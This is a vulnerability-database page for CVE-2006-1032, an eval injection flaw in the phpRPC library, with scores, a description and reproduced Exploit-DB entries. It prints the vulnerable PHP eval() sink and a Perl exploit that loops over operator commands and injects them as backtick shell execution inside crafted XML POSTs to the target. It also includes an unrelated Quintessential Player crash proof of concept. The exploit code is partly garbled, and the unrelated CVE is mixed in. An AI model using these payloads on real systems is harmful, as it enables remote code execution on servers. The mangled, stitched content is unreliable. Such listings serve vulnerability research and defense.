CVE-2006-1032
Published 2006-03-07
Priority P345 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.48% (87.7th percentile)
Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and earlier, as used by runcms, exoops, and possibly other programs, allows remote attackers to execute arbitrary PHP code via the base64 tag.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phprpc | phprpc | — | — |
| phprpc | phprpc | — | — |
| phprpc | phprpc | — | — |
No detection rules found.
Exploit-DB
phpRPC < 0.7 - Remote Code Execution
exploitdb·2016-02-26·CVSS 7.5
CVE-2006-1032 [HIGH] phpRPC < 0.7 - Remote Code Execution
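```php
// Excerpt from the decode function in phpRPC's rpc_decoder.php.
// The start of the excerpt (including the function header) is missing from this page.
$this->parser = xml_parser_create($this->encoding);
xml_set_object($this->parser, &$this);
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
xml_parser_set_option($this->parser, XML_OPTION_SKIP_WHITE, 1);
xml_parser_set_option($this->parser, XML_OPTION_CASE_FOLDING, 1);
xml_parser_set_option($this->parser, XML_OPTION_TARGET_ENCODING, $this->encoding);
xml_parse($this->parser, $data);
xml_parser_free($this->parser);
if ($this->debug == 1) { $this->dump(); }
// Vulnerable sink: $this->code is assembled from the request's character data
// by cdata() and passed to eval() without sanitization.
eval($this->code);
return $params;
}
```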
The variable $this->code in our case is constructed by the cdata() function, and is never sanitized when placed within a base64 tag. I guess this is because it is assumed that the data will be base64 encrypted and thus harmless,
Exploit-DB
Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
exploitdb·2006-11-28
CVE-2006-6261 Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)
---
/*
0-day Quintessential Player
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[1032]; /* Corruption Occurs after 1028 bytes */
int x;
printf("\n======================================================================\n");
printf("0-day Quintessential Player 4.50.1.82 and prior Playlist Denial Of Service PoC \n");
printf("Crashes Quintessential Player with a malformed playlist on load.\n");
printf("Discovered and Coded By: Greg Linares \n");
printf("Usage: %s \n", argv[0]);
printf("====================================================================\n\n\n");
if (argc Greg Linares (GLinares.code[at]gmail[dot]com)\n");
fclose(Exploit);
return 0;
}
// milw0rm.com [2006-11-28]
Exploit-DB
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
exploitdb·2006-03-01
CVE-2006-1032 phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)
---
#!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "connecterror\n";
while (1) {
print '[IRAN HOMELAND SECURITY]$ ';
$cmd = ;
chop($cmd);
last if ($cmd eq 'exit');
$xmldata = "test.method'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;";
print $sock "POST ".$xml." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: text/xml\n";
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
$good=0;
while ($ans = )
{
if ($good == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $good = 1; }
}
if ($good==0) {
No writeups or analysis indexed.
- http://secunia.com/advisories/19028
- http://secunia.com/advisories/19058
- http://securityreason.com/securityalert/502
- http://securitytracker.com/id?1015691
- http://www.gulftech.org/?node=research&article_id=00105-02262006
- http://www.securityfocus.com/archive/1/426193
- http://www.securityfocus.com/bid/16833
- http://www.vupen.com/english/advisories/2006/0745